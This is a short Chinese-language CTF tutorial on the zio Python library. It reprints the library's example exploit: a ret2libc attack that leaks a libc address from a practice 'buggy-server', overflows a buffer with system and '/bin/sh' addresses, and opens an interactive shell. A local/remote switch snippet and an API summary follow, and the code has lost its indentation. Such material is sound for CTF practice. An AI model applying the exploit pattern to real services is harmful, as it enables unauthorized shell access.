CTF中的EXP编写技巧 zio库的使用

zio库没有提供文档

这个是官方给出的一个例子程序

from zio import *
io = zio('./buggy-server')
# io = zio((pwn.server, 1337))

for i in xrange(1337):
io.writeline('add ' + str(i))
io.read_until('>>')

io.write("add TFpdp1gL4Qu4aVCHUF6AY5Gs7WKCoTYzPv49QSa\ninfo " + "A" * 49 + "\nshow\n")
io.read_until('A' * 49)
libc_base = l32(io.read(4)) - 0x1a9960
libc_system = libc_base + 0x3ea70
libc_binsh = libc_base + 0x15fcbf
payload = 'A' * 64 + l32(libc_system) + 'JJJJ' + l32(libc_binsh)
io.write('info ' + payload + "\nshow\nexit\n")
io.read_until(">>")
# We've got a shell;-)
io.interact()

可以做本地和远程的切换

from zio import *

if you_are_debugging_local_server_binary:
io = zio('./buggy-server')            # used for local pwning development
elif you_are_pwning_remote_server:
io = zio(('1.2.3.4', 1337))           # used to exploit remote service

io.write(your_awesome_ropchain_or_shellcode)
# hey, we got an interactive shell!
io.interact()

总结一下

zio (('127.0.0.1',3389)

, timeout = 9999

)

连接到ip的端口

zio('./pwn1') 加载本地文件

writeline('abc') 发送字符串

write(‘abc') 发送字符串

read_until('hello') 直到收到字符串

read(4) 接收

l32() 4byte

l64() 8byte

interact()与shell交互